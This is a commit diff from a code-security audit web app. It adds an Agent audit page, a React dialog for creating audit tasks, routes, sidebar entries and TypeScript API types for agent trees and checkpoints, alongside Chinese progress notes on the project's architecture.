- 包含执行状态和发现统计
- `GET /agent-tasks/{task_id}/checkpoints`: 检查点列表API
- 支持按Agent ID过滤
- 分页支持
- `GET /agent-tasks/{task_id}/checkpoints/{checkpoint_id}`: 检查点详情API
- 返回完整的Agent状态数据
### 已完成的工作 (2024-12 续2)
#### 13. 前端 Agent 审计页面 ✅ (Strix-inspired Terminal UI)
- `frontend/src/shared/api/agentTasks.ts`: 扩展 API
- `AgentTreeNode`, `AgentTreeResponse` 类型定义
- `AgentCheckpoint`, `CheckpointDetail` 类型定义
- `getAgentTree()`: 获取 Agent 树结构
- `getAgentCheckpoints()`: 获取检查点列表
- `getCheckpointDetail()`: 获取检查点详情
- `frontend/src/pages/AgentAudit.tsx`: 统一的 Agent 审计页面 (参考 Strix TUI 设计)
- **布局**: 左侧活动日志 (75%) + 右侧 Agent 树和统计 (25%)
- **启动画面**: ASCII Art + 动画加载效果
- **活动日志**:
- 实时流式显示 Agent 思考过程
- 工具调用和结果展示
- 漏洞发现高亮
- 自动滚动控制
- 可折叠的日志条目
- **Agent 树可视化**:
- 树状结构展示
- 节点状态图标(运行中/已完成/失败/等待)
- 发现数量徽章
- 节点选择交互
- **实时统计面板**:
- 进度百分比
- 文件分析进度
- Token 使用量
- 发现数量
- 严重程度分布
- **创建任务对话框**: 选择项目后直接跳转到实时流页面
- **任务控制**: 停止/取消任务
- `frontend/src/app/routes.tsx`: 路由配置
- `/agent-audit`: 启动画面 + 创建任务
- `/agent-audit/:taskId`: 任务实时流页面
- `frontend/src/components/layout/Sidebar.tsx`: 侧边栏导航
- 新增 Agent 审计入口图标
### 已完成的工作 (2024-12 续3)
#### 14. 执行架构切换 ✅
- **移除旧的 LangGraph 固定流程架构**
- **启用新的动态 Agent 树架构**
- `backend/app/api/v1/endpoints/agent_tasks.py`:
- `_execute_agent_task()` 重写为使用 `OrchestratorAgent`
- OrchestratorAgent 作为大脑,动态调度子 Agent
- 子 Agent: ReconAgent, AnalysisAgent, VerificationAgent
- 新增辅助函数: `_get_user_config()`, `_initialize_tools()`, `_collect_project_info()`, `_save_findings()`, `_calculate_security_score()`
### 待完成的工作
#### 1. 前端增强
- 知识模块选择 UI创建任务时
- 检查点恢复功能
- 导出报告功能
#### 2. 测试和优化
- 单元测试
- 集成测试
- 性能优化
- 并发执行压力测试
#### 3. 文档
- API文档更新
- 架构图更新
- 使用指南
---
## 十一、架构升级总结
### 已实现的核心功能
1. **Prompt Caching** - 为 Claude 等 LLM 提供缓存支持,减少 Token 消耗
2. **动态 Agent 树执行** - OrchestratorAgent 作为大脑,动态调度子 Agent
3. **Agent 状态持久化** - 文件系统和数据库双重持久化
4. **检查点机制** - 自动检查点、状态恢复、执行历史追踪
5. **增强的协作工具** - 子 Agent 创建、批量执行、结果收集
6. **完整的 API 支持** - Agent 树查询、检查点管理
7. **旧架构已移除** - 不再使用 LangGraph 固定流程,完全切换到动态 Agent 树
### 文件清单
```
backend/app/services/
├── llm/
│ ├── __init__.py # 模块导出
│ ├── prompt_cache.py # 🆕 Prompt Caching
│ ├── memory_compressor.py # Memory Compression
│ └── adapters/
│ └── litellm_adapter.py # 集成 Prompt Caching
├── agent/
│ ├── core/
│ │ ├── __init__.py # 模块导出
│ │ ├── state.py # Agent 状态管理
│ │ ├── registry.py # Agent 注册表
│ │ ├── message.py # Agent 间通信
│ │ ├── executor.py # 🆕 动态 Agent 树执行器
│ │ └── persistence.py # 🆕 状态持久化
│ │
│ ├── tools/
│ │ ├── __init__.py # 模块导出
│ │ ├── agent_tools.py # 🔄 增强的协作工具
│ │ ├── thinking_tool.py # Think/Reflect 工具
│ │ └── reporting_tool.py # 漏洞报告工具
│ │
│ ├── knowledge/ # 专业知识模块
│ │ ├── vulnerabilities/ # 漏洞类型知识
│ │ └── frameworks/ # 框架安全知识
│ │
│ └── agents/
│ ├── base.py # Agent 基类
│ ├── orchestrator.py # 编排 Agent
│ ├── analysis.py # 分析 Agent
│ └── verification.py # 验证 Agent
backend/app/models/
└── agent_task.py # 🔄 新增 AgentCheckpoint, AgentTreeNode
backend/app/api/v1/endpoints/
└── agent_tasks.py # 🔄 新增 Agent 树和检查点 API
backend/alembic/versions/
└── 007_add_agent_checkpoint_tables.py # 🆕 数据库迁移
frontend/src/shared/api/
└── agentTasks.ts # 🔄 扩展 Agent 树和检查点 API
frontend/src/pages/
└── AgentAudit.tsx # 🆕 统一的 Agent 审计页面 (Strix-inspired)
frontend/src/app/
└── routes.tsx # 🔄 新增 Agent 审计路由
frontend/src/components/layout/
└── Sidebar.tsx # 🔄 新增 Agent 审计导航图标
```
### 下一步计划
1. 测试前端页面渲染和流式事件
2. 知识模块选择 UI
3. 检查点恢复功能

View File

@ -59,6 +59,12 @@ const routes: RouteConfig[] = [
}, },
{ {
name: "Agent审计", name: "Agent审计",
path: "/agent-audit",
element: <AgentAudit />,
visible: true,
},
{
name: "Agent审计任务",
path: "/agent-audit/:taskId", path: "/agent-audit/:taskId",
element: <AgentAudit />, element: <AgentAudit />,
visible: false, visible: false,

View File

@ -0,0 +1,593 @@
/**
* Agent
* Agent Audit UI
*/
import { useState, useEffect, useMemo } from "react";
import { useNavigate } from "react-router-dom";
import {
Dialog,
DialogContent,
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Badge } from "@/components/ui/badge";
import { ScrollArea } from "@/components/ui/scroll-area";
import {
Collapsible,
CollapsibleContent,
CollapsibleTrigger,
} from "@/components/ui/collapsible";
import {
Select,
SelectContent,
SelectItem,
SelectTrigger,
SelectValue,
} from "@/components/ui/select";
import {
Search,
ChevronRight,
GitBranch,
Package,
Globe,
Loader2,
Bot,
Settings2,
Play,
Upload,
FolderOpen,
} from "lucide-react";
import { toast } from "sonner";
import { api } from "@/shared/config/database";
import { createAgentTask } from "@/shared/api/agentTasks";
import { isRepositoryProject, isZipProject } from "@/shared/utils/projectUtils";
import { getZipFileInfo, type ZipFileMeta } from "@/shared/utils/zipStorage";
import { validateZipFile } from "@/features/projects/services/repoZipScan";
import type { Project } from "@/shared/types";
import FileSelectionDialog from "@/components/audit/FileSelectionDialog";
interface CreateAgentTaskDialogProps {
open: boolean;
onOpenChange: (open: boolean) => void;
}
const DEFAULT_EXCLUDES = [
"node_modules/**",
".git/**",
"dist/**",
"build/**",
"*.log",
];
export default function CreateAgentTaskDialog({
open,
onOpenChange,
}: CreateAgentTaskDialogProps) {
const navigate = useNavigate();
// 状态
const [projects, setProjects] = useState<Project[]>([]);
const [loadingProjects, setLoadingProjects] = useState(true);
const [selectedProjectId, setSelectedProjectId] = useState<string>("");
const [searchTerm, setSearchTerm] = useState("");
const [branch, setBranch] = useState("main");
const [branches, setBranches] = useState<string[]>([]);
const [loadingBranches, setLoadingBranches] = useState(false);
const [excludePatterns, setExcludePatterns] = useState(DEFAULT_EXCLUDES);
const [showAdvanced, setShowAdvanced] = useState(false);
const [creating, setCreating] = useState(false);
// ZIP 文件状态
const [zipFile, setZipFile] = useState<File | null>(null);
const [storedZipInfo, setStoredZipInfo] = useState<ZipFileMeta | null>(null);
const [useStoredZip, setUseStoredZip] = useState(true);
// 文件选择状态
const [selectedFiles, setSelectedFiles] = useState<string[] | undefined>();
const [showFileSelection, setShowFileSelection] = useState(false);
const selectedProject = projects.find((p) => p.id === selectedProjectId);
// 加载项目列表
useEffect(() => {
if (open) {
setLoadingProjects(true);
api.getProjects()
.then((data) => {
setProjects(data.filter((p: Project) => p.is_active));
})
.catch(() => {
toast.error("加载项目列表失败");
})
.finally(() => setLoadingProjects(false));
// 重置状态
setSelectedProjectId("");
setSearchTerm("");
setBranch("main");
setExcludePatterns(DEFAULT_EXCLUDES);
setShowAdvanced(false);
setZipFile(null);
setStoredZipInfo(null);
setSelectedFiles(undefined);
}
}, [open]);
// 加载分支列表
useEffect(() => {
const loadBranches = async () => {
// 使用 selectedProjectId 从 projects 中获取最新的 project 对象
const project = projects.find((p) => p.id === selectedProjectId);
if (!project || !isRepositoryProject(project)) {
setBranches([]);
return;
}
setLoadingBranches(true);
try {
const result = await api.getProjectBranches(project.id);
console.log("[Branch] 加载分支结果:", result);
if (result.error) {
console.warn("[Branch] 加载分支警告:", result.error);
toast.error(`加载分支失败: ${result.error}`);
}
setBranches(result.branches);
if (result.default_branch) {
setBranch(result.default_branch);
}
} catch (err) {
const msg = err instanceof Error ? err.message : "未知错误";
console.error("[Branch] 加载分支失败:", msg);
toast.error(`加载分支失败: ${msg}`);
setBranches([project.default_branch || "main"]);
} finally {
setLoadingBranches(false);
}
};
loadBranches();
}, [selectedProjectId, projects]);
// 加载 ZIP 文件信息
useEffect(() => {
const loadZipInfo = async () => {
if (!selectedProject || !isZipProject(selectedProject)) {
setStoredZipInfo(null);
return;
}
try {
const info = await getZipFileInfo(selectedProject.id);
setStoredZipInfo(info);
setUseStoredZip(info.has_file);
} catch {
setStoredZipInfo(null);
}
};
loadZipInfo();
}, [selectedProject?.id]);
// 过滤项目
const filteredProjects = useMemo(() => {
if (!searchTerm) return projects;
const term = searchTerm.toLowerCase();
return projects.filter(
(p) =>
p.name.toLowerCase().includes(term) ||
p.description?.toLowerCase().includes(term)
);
}, [projects, searchTerm]);
// 是否可以开始
const canStart = useMemo(() => {
if (!selectedProject) return false;
if (isZipProject(selectedProject)) {
return (useStoredZip && storedZipInfo?.has_file) || !!zipFile;
}
return !!selectedProject.repository_url && !!branch.trim();
}, [selectedProject, useStoredZip, storedZipInfo, zipFile, branch]);
// 创建任务
const handleCreate = async () => {
if (!selectedProject) return;
setCreating(true);
try {
const agentTask = await createAgentTask({
project_id: selectedProject.id,
name: `Agent审计-${selectedProject.name}`,
branch_name: isRepositoryProject(selectedProject) ? branch : undefined,
exclude_patterns: excludePatterns,
target_files: selectedFiles,
verification_level: "sandbox",
});
onOpenChange(false);
toast.success("Agent 审计任务已创建");
navigate(`/agent-audit/${agentTask.id}`);
} catch (err) {
const msg = err instanceof Error ? err.message : "创建失败";
toast.error(msg);
} finally {
setCreating(false);
}
};
// 处理文件上传
const handleFileChange = (e: React.ChangeEvent<HTMLInputElement>) => {
const file = e.target.files?.[0];
if (file) {
const validation = validateZipFile(file);
if (!validation.valid) {
toast.error(validation.error || "文件无效");
e.target.value = "";
return;
}
setZipFile(file);
setUseStoredZip(false);
}
};
return (
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="!w-[min(90vw,480px)] !max-w-none max-h-[85vh] flex flex-col p-0 gap-0 bg-[#0d0d12] border border-gray-800 rounded-lg">
{/* Header */}
<DialogHeader className="px-5 py-4 border-b border-gray-800 flex-shrink-0">
<DialogTitle className="flex items-center gap-3 font-mono text-white">
<div className="p-2 bg-primary/20 rounded">
<Bot className="w-5 h-5 text-primary" />
</div>
<div>
<span className="text-base font-bold">New Agent Audit</span>
<p className="text-xs text-gray-500 font-normal mt-0.5">
AI-Powered Security Analysis
</p>
</div>
</DialogTitle>
</DialogHeader>
<div className="flex-1 overflow-y-auto p-5 space-y-5">
{/* 项目选择 */}
<div className="space-y-3">
<div className="flex items-center justify-between">
<span className="text-xs font-mono font-bold uppercase text-gray-400">
Select Project
</span>
<Badge variant="outline" className="border-gray-700 text-gray-500 font-mono text-[10px]">
{filteredProjects.length} available
</Badge>
</div>
{/* 搜索框 */}
<div className="relative">
<Search className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-gray-600" />
<Input
placeholder="Search projects..."
value={searchTerm}
onChange={(e) => setSearchTerm(e.target.value)}
className="pl-9 h-10 bg-gray-900/50 border-gray-800 text-white font-mono placeholder:text-gray-600 focus:border-primary focus:ring-0"
/>
</div>
{/* 项目列表 */}
<ScrollArea className="h-[200px] border border-gray-800 rounded-lg bg-gray-900/30">
{loadingProjects ? (
<div className="flex items-center justify-center h-full">
<Loader2 className="w-5 h-5 animate-spin text-primary" />
</div>
) : filteredProjects.length === 0 ? (
<div className="flex flex-col items-center justify-center h-full text-gray-600 font-mono">
<Package className="w-8 h-8 mb-2 opacity-50" />
<span className="text-sm">{searchTerm ? "No matches" : "No projects"}</span>
</div>
) : (
<div className="p-1">
{filteredProjects.map((project) => (
<ProjectItem
key={project.id}
project={project}
selected={selectedProjectId === project.id}
onSelect={() => setSelectedProjectId(project.id)}
/>
))}
</div>
)}
</ScrollArea>
</div>
{/* 配置区域 */}
{selectedProject && (
<div className="space-y-4">
{/* 仓库项目:分支选择 */}
{isRepositoryProject(selectedProject) && (
<div className="flex items-center gap-3 p-3 border border-gray-800 rounded-lg bg-blue-950/20">
<GitBranch className="w-5 h-5 text-blue-400" />
<span className="font-mono text-sm text-gray-400 w-16">Branch</span>
{loadingBranches ? (
<div className="flex items-center gap-2 flex-1">
<Loader2 className="w-4 h-4 animate-spin text-blue-400" />
<span className="text-sm text-blue-400 font-mono">Loading...</span>
</div>
) : (
<Select value={branch} onValueChange={setBranch}>
<SelectTrigger className="flex-1 h-9 bg-gray-900/50 border-gray-700 text-white font-mono focus:ring-0">
<SelectValue placeholder="Select branch" />
</SelectTrigger>
<SelectContent className="bg-gray-900 border-gray-700">
{branches.map((b) => (
<SelectItem key={b} value={b} className="font-mono text-white">
{b}
</SelectItem>
))}
</SelectContent>
</Select>
)}
</div>
)}
{/* ZIP 项目:文件选择 */}
{isZipProject(selectedProject) && (
<div className="p-3 border border-gray-800 rounded-lg bg-amber-950/20 space-y-3">
<div className="flex items-center gap-3">
<Package className="w-5 h-5 text-amber-400" />
<span className="font-mono text-sm text-gray-400">ZIP File</span>
</div>
{storedZipInfo?.has_file && (
<div
className={`p-2 rounded border cursor-pointer transition-colors ${
useStoredZip
? 'border-green-500 bg-green-950/30'
: 'border-gray-700 hover:border-gray-600'
}`}
onClick={() => setUseStoredZip(true)}
>
<div className="flex items-center gap-2">
<div className={`w-3 h-3 rounded-full border-2 ${
useStoredZip ? 'border-green-500 bg-green-500' : 'border-gray-600'
}`} />
<span className="text-sm text-white font-mono">
{storedZipInfo.original_filename}
</span>
<Badge className="bg-green-500/20 text-green-400 border-0 text-[10px]">
Stored
</Badge>
</div>
</div>
)}
<div
className={`p-2 rounded border cursor-pointer transition-colors ${
!useStoredZip && zipFile
? 'border-amber-500 bg-amber-950/30'
: 'border-gray-700 hover:border-gray-600'
}`}
>
<label className="flex items-center gap-2 cursor-pointer">
<div className={`w-3 h-3 rounded-full border-2 ${
!useStoredZip && zipFile ? 'border-amber-500 bg-amber-500' : 'border-gray-600'
}`} />
<Upload className="w-4 h-4 text-gray-500" />
<span className="text-sm text-gray-400 font-mono">
{zipFile ? zipFile.name : "Upload new file..."}
</span>
<input
type="file"
accept=".zip"
onChange={handleFileChange}
className="hidden"
/>
</label>
</div>
</div>
)}
{/* 高级选项 */}
<Collapsible open={showAdvanced} onOpenChange={setShowAdvanced}>
<CollapsibleTrigger className="flex items-center gap-2 text-xs font-mono text-gray-500 hover:text-gray-300 transition-colors">
<ChevronRight className={`w-4 h-4 transition-transform ${showAdvanced ? "rotate-90" : ""}`} />
<Settings2 className="w-4 h-4" />
<span className="uppercase font-bold">Advanced Options</span>
</CollapsibleTrigger>
<CollapsibleContent className="mt-3 space-y-3">
{/* 文件选择 */}
{(() => {
const isRepo = isRepositoryProject(selectedProject);
const isZip = isZipProject(selectedProject);
const hasStoredZip = storedZipInfo?.has_file;
// 可以选择文件的条件:仓库项目 或 ZIP项目使用已存储文件
const canSelectFiles = isRepo || (isZip && useStoredZip && hasStoredZip);
return (
<div className="flex items-center justify-between p-3 border border-dashed border-gray-700 rounded-lg bg-gray-900/30">
<div>
<p className="font-mono text-xs uppercase font-bold text-gray-500">
Scan Scope
</p>
<p className="text-sm text-white font-mono mt-1">
{selectedFiles
? `${selectedFiles.length} files selected`
: "All files"}
</p>
</div>
<div className="flex gap-2">
{selectedFiles && canSelectFiles && (
<Button
size="sm"
variant="ghost"
onClick={() => setSelectedFiles(undefined)}
className="h-8 text-xs text-red-400 hover:bg-red-900/30 hover:text-red-300"
>
Reset
</Button>
)}
<Button
size="sm"
variant="outline"
onClick={() => setShowFileSelection(true)}
disabled={!canSelectFiles}
className="h-8 text-xs border-gray-700 text-gray-300 hover:bg-gray-800 hover:text-white font-mono disabled:opacity-50"
>
<FolderOpen className="w-3 h-3 mr-1" />
Select Files
</Button>
</div>
</div>
);
})()}
{/* 排除模式 */}
<div className="p-3 border border-dashed border-gray-700 rounded-lg bg-gray-900/30 space-y-3">
<div className="flex items-center justify-between">
<span className="font-mono text-xs uppercase font-bold text-gray-500">
Exclude Patterns
</span>
<button
type="button"
onClick={() => setExcludePatterns(DEFAULT_EXCLUDES)}
className="text-xs font-mono text-primary hover:text-primary/80"
>
Reset
</button>
</div>
<div className="flex flex-wrap gap-1.5">
{excludePatterns.map((p) => (
<Badge
key={p}
variant="secondary"
className="bg-gray-800 text-gray-300 border-0 font-mono text-xs cursor-pointer hover:bg-red-900/50 hover:text-red-400"
onClick={() => setExcludePatterns((prev) => prev.filter((x) => x !== p))}
>
{p} ×
</Badge>
))}
</div>
<Input
placeholder="Add pattern, press Enter..."
className="h-8 bg-gray-900/50 border-gray-700 text-white font-mono text-sm placeholder:text-gray-600 focus:ring-0"
onKeyDown={(e) => {
if (e.key === "Enter" && e.currentTarget.value) {
const val = e.currentTarget.value.trim();
if (val && !excludePatterns.includes(val)) {
setExcludePatterns((prev) => [...prev, val]);
}
e.currentTarget.value = "";
}
}}
/>
</div>
</CollapsibleContent>
</Collapsible>
</div>
)}
</div>
{/* Footer */}
<div className="flex-shrink-0 flex justify-end gap-3 px-5 py-4 bg-gray-900/50 border-t border-gray-800">
<Button
variant="ghost"
onClick={() => onOpenChange(false)}
disabled={creating}
className="px-4 h-10 font-mono text-gray-400 hover:text-white hover:bg-gray-800"
>
Cancel
</Button>
<Button
onClick={handleCreate}
disabled={!canStart || creating}
className="px-5 h-10 bg-primary hover:bg-primary/90 text-white font-mono font-bold"
>
{creating ? (
<>
<Loader2 className="w-4 h-4 animate-spin mr-2" />
Starting...
</>
) : (
<>
<Play className="w-4 h-4 mr-2" />
Start Audit
</>
)}
</Button>
</div>
</DialogContent>
{/* 文件选择对话框 */}
<FileSelectionDialog
open={showFileSelection}
onOpenChange={setShowFileSelection}
projectId={selectedProjectId}
branch={branch}
excludePatterns={excludePatterns}
onConfirm={setSelectedFiles}
/>
</Dialog>
);
}
// 项目列表项
function ProjectItem({
project,
selected,
onSelect,
}: {
project: Project;
selected: boolean;
onSelect: () => void;
}) {
const isRepo = isRepositoryProject(project);
return (
<div
className={`flex items-center gap-3 p-3 cursor-pointer rounded-lg transition-all ${
selected
? "bg-primary/10 border border-primary/50"
: "hover:bg-gray-800/50 border border-transparent"
}`}
onClick={onSelect}
>
<div className={`p-1.5 rounded ${isRepo ? "bg-blue-500/20" : "bg-amber-500/20"}`}>
{isRepo ? (
<Globe className="w-4 h-4 text-blue-400" />
) : (
<Package className="w-4 h-4 text-amber-400" />
)}
</div>
<div className="flex-1 min-w-0">
<div className="flex items-center gap-2">
<span className={`font-mono text-sm truncate ${selected ? 'text-white font-bold' : 'text-gray-300'}`}>
{project.name}
</span>
<Badge
variant="outline"
className={`text-[10px] px-1 py-0 font-mono ${
isRepo
? "border-blue-500/50 text-blue-400"
: "border-amber-500/50 text-amber-400"
}`}
>
{isRepo ? "REPO" : "ZIP"}
</Badge>
</div>
{project.description && (
<p className="text-xs text-gray-600 mt-0.5 font-mono truncate">
{project.description}
</p>
)}
</div>
{selected && (
<div className="w-2 h-2 rounded-full bg-primary animate-pulse" />
)}
</div>
);
}

View File

@ -30,7 +30,6 @@ import {
Upload, Upload,
FolderOpen, FolderOpen,
Settings2, Settings2,
Play,
Package, Package,
Globe, Globe,
Shield, Shield,
@ -111,28 +110,39 @@ export default function CreateTaskDialog({
// 加载分支列表 // 加载分支列表
useEffect(() => { useEffect(() => {
const loadBranches = async () => { const loadBranches = async () => {
if (!selectedProject || !isRepositoryProject(selectedProject)) { // 使用 selectedProjectId 从 projects 中获取最新的 project 对象
const project = projects.find((p) => p.id === selectedProjectId);
if (!project || !isRepositoryProject(project)) {
setBranches([]); setBranches([]);
return; return;
} }
setLoadingBranches(true); setLoadingBranches(true);
try { try {
const result = await api.getProjectBranches(selectedProject.id); const result = await api.getProjectBranches(project.id);
console.log("[Branch] 加载分支结果:", result);
if (result.error) {
console.warn("[Branch] 加载分支警告:", result.error);
toast.error(`加载分支失败: ${result.error}`);
}
setBranches(result.branches); setBranches(result.branches);
if (result.default_branch) { if (result.default_branch) {
setBranch(result.default_branch); setBranch(result.default_branch);
} }
} catch (error) { } catch (error) {
console.error("加载分支失败:", error); const msg = error instanceof Error ? error.message : "未知错误";
setBranches([selectedProject.default_branch || "main"]); console.error("[Branch] 加载分支失败:", msg);
toast.error(`加载分支失败: ${msg}`);
setBranches([project.default_branch || "main"]);
} finally { } finally {
setLoadingBranches(false); setLoadingBranches(false);
} }
}; };
loadBranches(); loadBranches();
}, [selectedProject?.id]); }, [selectedProjectId, projects]);
const filteredProjects = useMemo(() => { const filteredProjects = useMemo(() => {
if (!searchTerm) return projects; if (!searchTerm) return projects;
@ -437,7 +447,8 @@ export default function CreateTaskDialog({
)} )}
{/* 高级选项 */} {/* 高级选项 */}
{/* 规则集和提示词选择 */} {/* 规则集和提示词选择 - 仅快速扫描模式显示 */}
{auditMode !== "agent" && (
<div className="p-3 border-2 border-black bg-purple-50 space-y-3"> <div className="p-3 border-2 border-black bg-purple-50 space-y-3">
<div className="flex items-center gap-2 mb-2"> <div className="flex items-center gap-2 mb-2">
<Zap className="w-4 h-4 text-purple-700" /> <Zap className="w-4 h-4 text-purple-700" />
@ -476,6 +487,7 @@ export default function CreateTaskDialog({
</div> </div>
</div> </div>
</div> </div>
)}
<Collapsible open={showAdvanced} onOpenChange={setShowAdvanced}> <Collapsible open={showAdvanced} onOpenChange={setShowAdvanced}>
<CollapsibleTrigger className="flex items-center gap-2 text-sm font-mono text-gray-600 hover:text-black transition-colors"> <CollapsibleTrigger className="flex items-center gap-2 text-sm font-mono text-gray-600 hover:text-black transition-colors">

View File

@ -16,7 +16,8 @@ import {
Github, Github,
UserCircle, UserCircle,
Shield, Shield,
MessageSquare MessageSquare,
Bot
} from "lucide-react"; } from "lucide-react";
import routes from "@/app/routes"; import routes from "@/app/routes";
import { version } from "../../../package.json"; import { version } from "../../../package.json";
@ -27,6 +28,7 @@ const routeIcons: Record<string, React.ReactNode> = {
"/projects": <FolderGit2 className="w-5 h-5" />, "/projects": <FolderGit2 className="w-5 h-5" />,
"/instant-analysis": <Zap className="w-5 h-5" />, "/instant-analysis": <Zap className="w-5 h-5" />,
"/audit-tasks": <ListTodo className="w-5 h-5" />, "/audit-tasks": <ListTodo className="w-5 h-5" />,
"/agent-audit": <Bot className="w-5 h-5" />,
"/audit-rules": <Shield className="w-5 h-5" />, "/audit-rules": <Shield className="w-5 h-5" />,
"/prompts": <MessageSquare className="w-5 h-5" />, "/prompts": <MessageSquare className="w-5 h-5" />,
"/admin": <Settings className="w-5 h-5" />, "/admin": <Settings className="w-5 h-5" />,

File diff suppressed because it is too large Load Diff

View File

@ -26,6 +26,11 @@ export interface AgentTask {
verified_count: number; verified_count: number;
false_positive_count: number; false_positive_count: number;
// Agent 统计
total_iterations: number;
tool_calls_count: number;
tokens_used: number;
// 严重程度统计 // 严重程度统计
critical_count: number; critical_count: number;
high_count: number; high_count: number;
@ -34,7 +39,7 @@ export interface AgentTask {
// 评分 // 评分
quality_score: number; quality_score: number;
security_score: number; security_score: number | null;
// 时间 // 时间
created_at: string; created_at: string;
@ -44,6 +49,13 @@ export interface AgentTask {
// 进度 // 进度
progress_percentage: number; progress_percentage: number;
// 配置
audit_scope: Record<string, unknown> | null;
target_vulnerabilities: string[] | null;
verification_level: string | null;
exclude_patterns: string[] | null;
target_files: string[] | null;
// 错误信息 // 错误信息
error_message: string | null; error_message: string | null;
} }
@ -307,3 +319,89 @@ export async function* streamAgentEvents(
} }
} }
// ============ Agent Tree Types ============
export interface AgentTreeNode {
id: string;
agent_id: string;
agent_name: string;
agent_type: string;
parent_agent_id: string | null;
depth: number;
task_description: string | null;
knowledge_modules: string[] | null;
status: "created" | "running" | "completed" | "failed" | "waiting";
result_summary: string | null;
findings_count: number;
iterations: number;
tokens_used: number;
tool_calls: number;
duration_ms: number | null;
children: AgentTreeNode[];
}
export interface AgentTreeResponse {
task_id: string;
root_agent_id: string | null;
total_agents: number;
running_agents: number;
completed_agents: number;
failed_agents: number;
total_findings: number;
nodes: AgentTreeNode[];
}
export interface AgentCheckpoint {
id: string;
agent_id: string;
agent_name: string;
agent_type: string;
iteration: number;
status: string;
total_tokens: number;
tool_calls: number;
findings_count: number;
checkpoint_type: "auto" | "manual" | "error" | "final";
checkpoint_name: string | null;
created_at: string | null;
}
export interface CheckpointDetail extends AgentCheckpoint {
task_id: string;
parent_agent_id: string | null;
state_data: Record<string, unknown>;
metadata: Record<string, unknown> | null;
}
// ============ Agent Tree API Functions ============
/**
* Agent
*/
export async function getAgentTree(taskId: string): Promise<AgentTreeResponse> {
const response = await apiClient.get(`/agent-tasks/${taskId}/agent-tree`);
return response.data;
}
/**
*
*/
export async function getAgentCheckpoints(
taskId: string,
params?: { agent_id?: string; limit?: number }
): Promise<AgentCheckpoint[]> {
const response = await apiClient.get(`/agent-tasks/${taskId}/checkpoints`, { params });
return response.data;
}
/**
*
*/
export async function getCheckpointDetail(
taskId: string,
checkpointId: string
): Promise<CheckpointDetail> {
const response = await apiClient.get(`/agent-tasks/${taskId}/checkpoints/${checkpointId}`);
return response.data;
}